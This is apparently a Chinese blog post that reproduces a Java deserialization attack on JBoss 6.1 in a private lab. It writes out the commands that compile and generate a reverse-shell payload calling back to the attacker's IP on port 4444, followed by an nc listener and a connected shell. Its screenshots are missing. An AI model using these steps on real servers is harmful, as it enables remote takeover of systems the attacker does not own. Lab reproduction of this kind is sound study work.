CVE-2017-12419漏洞复现
2018-02-03 本文已影响0人
__周__
- 测试平台:win7
- 测试环境:jboss-6.1.0.Final
- 测试工具:kali
- 服务器IP:192.168.11.116
- 攻击机IP:192.168.11.118
我是从官网下载的直接解压就可以用,各个版本的JBOSS文件位置可能不一样
server.xml路径:
jboss-6.1.0.Final\server\default\deploy\jbossweb.sar\server.xml
首先需要把service.xml的内容改为图下的内容
图片.png然后找到
jboss-6.1.0.Final\bin\run.bat
运行,之后如果看到了
图片.png
那么说明启动成功,本地访问一下,看是否可以访问到
图片.png
可以访问;
接下来去kali中,去github下载poc
https://github.com/joaomatosf/JavaDeserH2HC
然后在kali中执行生成二进制的payload文件。
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
修改接受shell的主机IP和端口
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.11.118:4444
重开一个窗口,开启nc监听本地4444端口
图片.png然后发送payload到服务器
图片中IP可能不对应,我的图没了,又比较懒就懒得搞了.jpg
查看nc 有shell 连接进来
图片中IP可能不对应,我的图没了,又比较懒就懒得搞了.png